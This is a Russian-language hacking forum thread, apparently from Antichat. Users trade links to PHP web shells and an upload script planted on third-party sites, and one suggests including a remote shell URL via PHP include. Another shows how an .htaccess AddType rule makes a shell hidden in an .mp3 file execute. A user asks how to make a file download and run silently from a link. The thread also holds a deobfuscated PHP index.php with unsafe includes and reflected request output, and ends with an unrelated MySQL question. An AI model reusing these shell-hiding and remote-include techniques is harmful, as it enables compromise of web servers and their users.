это первое что пришло мне в голову) я нуб) а что подробнее? http://drdrum.freehostia.com/vet.php <img src="http://4room.surgut.info/images/graemlins/vet.php"> http://4room.surgut.info/images/graemlins/vet.php сам шелл http://4room.surgut.info/images/graemlins/up.php похоже аплоад =)
Ты не можешь выполнить код с уделаенного сервера у себя с помощью HTML, JS. Для этого есть функция include и require. Пример: PHP: <?php include('http://4room.surgut.info/images/graemlins/vet.php'); ?> geforse, сорри, я ошибся, думал он уязвимость ищет...
ни инклуд ни реквире у меня не работает (freehostia) http://drdrum.freehostia.com/vet.php ..а жаль ):
ну на то она и фрихостиа, а шелл через HTML ты не зальёшь - запомни это. HTML/JS не имеет доступа к файловой системе. Исключением могут быть уязвимости в браузерах.
В чем он ошибается? Если расширение .php, это не значит, что код должен интерпретироватся. PS: Он имел ввиду, что это неинтерпретированый шелл.
Привет всем ещё раз, я вам недавно выкладывал index.php для расшифровки, я вам благодарен то что помогли, но он не работает...вобщем я вас прошу помочь полностью расшифровать php скрипт, перебрав исходный код думаю, скорее всего в нем идет запрос на сервер разработчика... если надо то я могу выложить полный движок http://gaberi.ru/Game_Poratal_v2.5.rar Вот сам index.php http://rapidshare.com/files/259082125/index.php.html
Полностью это как? В прошлый раз до такого расшифровали? PHP: <?php include ("header.php"); // Reproduction of this code without written permission is strictly forbidden // if ($skin == 'default') { include "left.php"; } else { include "skins/$skin/left.php"; } if ($_REQUEST[page] == '') { include "templates/index.php"; } else { if ($_REQUEST[page] == 'Features') { $cpage = "pages/features.php"; } if ($_REQUEST[page] == 'Story') { $cpage = "pages/story.php"; } if ($_REQUEST[page] == 'About Us') { $cpage = "pages/about.php"; } if ($_REQUEST[page] == 'Archive') { $cpage = "pages/archive.php"; } if ($_REQUEST[page] == 'Logout') { $cpage = "pages/logout.php"; } if ($_REQUEST[page] == 'Submit News') { $cpage = "pages/submit.php"; } if ($_REQUEST[page] == 'User Profile') { $cpage = "pages/uprofile.php"; } if ($_REQUEST[page] == 'Edit Profile') { $cpage = "pages/eprofile.php"; } if ($_REQUEST[page] == 'Register') { $cpage = "pages/register.php"; } if ($_REQUEST[page] == 'Files') { $cpage = "pages/files.php"; } if ($_REQUEST[page] == 'Submit') { $cpage = "pages/submitpage.php"; } if ($_REQUEST[page] == 'Media') { $cpage = "pages/media.php"; } if ($_REQUEST[page] == 'Links') { $cpage = "pages/links.php"; } if ($_REQUEST[page] == 'Articles') { $cpage = "pages/articles.php"; } if ($_REQUEST[page] == 'Games') { $cpage = "pages/games.php"; } if ($_REQUEST[page] == 'Top Games') { $cpage = "pages/topgames.php"; } if ($_REQUEST[page] == 'Statistics') { $cpage = "pages/statistics.php"; } if ($_REQUEST[page] == 'Contact') { $cpage = "pages/contact.php"; } if ($_REQUEST[page] == 'Page') { $cpage = "pages/page.php"; } if ($_REQUEST[page] == 'User Registration') { $cpage = "pages/ureg.php"; } if ($_REQUEST[page] == 'Search') { $cpage = "pages/search.php"; } if ($_REQUEST[page] == 'Game Stats') { $cpage = "pages/gamestats.php"; } if ($_REQUEST[page] == 'Game Stats') { $cpage = "pages/gamestats.php"; } if ($_REQUEST[page] == 'Company') { $cpage = "pages/company.php"; } if ($_REQUEST[page] == 'User CP') { $cpage = "pages/usercp.php"; } if ($_REQUEST[page] == 'Cheats') { $cpage = "pages/cheats.php"; } if ($_REQUEST[page] == 'Online') { $cpage = "pages/online.php"; } if ($_REQUEST[page] == 'Console') { $cpage = "pages/console.php"; } if ($_REQUEST[page] == 'Companies') { $cpage = "pages/company.php"; } if ($_REQUEST[page] == 'Members') { $cpage = "pages/members.php"; } if ($_REQUEST[page] == 'Vote') { $cpage = "pages/vote.php"; } if ($_REQUEST[page] == 'Poll') { $cpage = "pages/poll.php"; } if ($_REQUEST[page] == 'Login') { $cpage = "pages/login.php"; } if ($_REQUEST[page] == 'Password') { $cpage = "pages/password.php"; } if ($_REQUEST[page] == 'Blogs') { $cpage = "pages/blogs.php"; } ?> <table width="564" cellpadding="1" align="center" cellspacing="0" border="0" style="background: url(images/index_head.jpg) no-repeat top left;"> <tr> <td width="564" height="191" valign="top" align="left"> <p class="padding1"> <table width="560" bgcolor="#C4C4C4" cellpadding="0" cellspacing="1" border="0"> <tr> <td width="100%" height="21" background="images/bg_light.jpg"> <table cellpadding="2" cellspacing="0" border="0" width="100%" align="center"> <tr> <td width="60%"><SPAN class="pagenav"> <?echo "$_REQUEST[page]"?></SPAN></td> <td width="39%" align="right"><SPAN class="headlineb"> « <a class="headlineb" href="javascript:history.go(-1)" class="headlineb"><?echo "$lang_back"?></a></SPAN></td> <td width="1%" align="right"><? $cururl = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; echo "<a class=\"headlineb\" onclick=\"NewWindow(this.href,'name','500','300','yes');return false\" href=\"sendtofriend.php?url=$cururl\"><img src=\"images/send.jpg\" border=\"0\"></a>"; ?></td> </tr> </table> </td> </tr> </table> <? include "$cpage"; ?> </p> </td> </tr> </table> <? } if ($skin == 'default') { include "right.php"; include "footer.php"; } else { include "skins/$skin/right.php"; include "skins/$skin/footer.php"; } echo "$footer_insert"; ?>
все ок, спасиб, просил расшифровать, а получилось вот так http://forum.antichat.ru/showpost.php?p=1403862&postcount=11477
я пытался расшифровать сам, при расшифровки у меня был точно такой же результат как по ссылки... Но щас всё ок... Античат Рулит=)
Добавь себе в файл .htaccess Code: AddType text/plain .php И ты увидишь чудо, вместо шелла! Есть десятки способов убрать интерпретирование кода. И не спорь со мной
О да... Заметь, я не говорил - если расширение .php - то скрипт не интерпретируется. Я говорил, что если расширение .php, это не значит, что он должен иньтерпретироватся. PS: Воткни в .htaccess Code: AddType application/x-httpd-php .mp3 И в файлик music.mp3 воткни код шелла, и ты увидишь еще одно чудо 21 века - вместо окошка скачивания файла, интерпретируется шелл. Читай про AddType.
ты волшебнег) а можно какнеть организовать скрытый запуск файла? ну там переходят по ссылке..бах грузится файл..(в фоновом режиме) бабах он еще и запустился
id name last_name patronymic 1 Маша Иванов Николаевна 1 Денис Попов Владимирович 2 Света Кузнецова Светлавна 2 Петя Сидоров Петрович Есть запрос $dp = mysql_query("SELECT name,last_name,patronymic FROM man WHERE id =1"); В переменную $row = mysql_fetch_array($dp) попадает массив который содержит только первую строчку. echo $name=$row[1]; покажет мне "ИВАНОВ" После повторного запроса $row = mysql_fetch_array($res); echo $name1=$row[1]; покажет мне "ПОПОВ" Подскажите можно ли как-то вынести сразу "ПОПОВ" или там "ДЕНИС" не прибегая к повторному запросу. И не делая немыслимые циклы, приравнивая каждую переменную.
